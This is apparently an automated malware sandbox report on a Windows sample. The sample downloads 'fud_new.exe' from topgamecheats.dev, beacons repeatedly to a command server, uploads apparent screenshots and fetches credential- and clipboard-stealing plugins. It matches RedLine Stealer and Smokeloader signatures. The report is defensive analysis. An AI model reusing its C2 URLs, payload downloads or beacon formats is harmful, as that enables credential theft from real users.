Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwNDcyHost: topgamecheats.devContent-Length: 100624Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 93.123.39.96 93.123.39.96
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NET1-ASBG NET1-ASBG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /fud_new.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: topgamecheats.devConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Code function: 0_2_00007FF6A4F114C7 URLDownloadToFileA, 0_2_00007FF6A4F114C7
Source: global traffic HTTP traffic detected: GET /fud_new.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: topgamecheats.devConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
Source: unknown DNS traffic detected: queries for: topgamecheats.dev
Source: unknown HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: GhLMDfzXqQ.exe String found in binary or memory: http://%s/%sfud_new.exe%s%sIndex:
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000003.2896132724.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/(
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dlls.storage.dll
Source: Dctooux.exe, 00000024.00000003.2896132724.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000002.3366637117.0000000002E72000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000002.3366637117.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000003.2896132724.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll
Source: Dctooux.exe, 00000024.00000003.2896132724.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dllJi
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002E72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dllf
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php
Source: Dctooux.exe, 00000024.00000002.3366413769.0000000002E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php32
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1#
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1-
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=11
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002E72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=11-
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1I
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1_
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1dB
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1e
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1i
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1lB
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002E72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1n
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1w
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpG
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpd
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpd5
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpdQ
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002F18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpdc
Source: Dctooux.exe, 00000024.00000003.2896132724.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpfb-62d94b9afd9b
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpp
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/e
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE50707000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exe
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exe)F
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exe.mui
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE5077C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exeCC:
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE5075A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exeLMEMP
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exeWWC:
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE50707000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exed:
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/fud_new.exey
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/r
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE50764000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.2288637913.0000000002DA2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.2290385798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000018.00000002.2290111678.0000000002EF2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000024.00000002.3366496339.0000000002E34000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000024.00000002.3368787116.0000000004910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2289959026.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 4_2_0041FEA7
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 24_2_0041FEA7
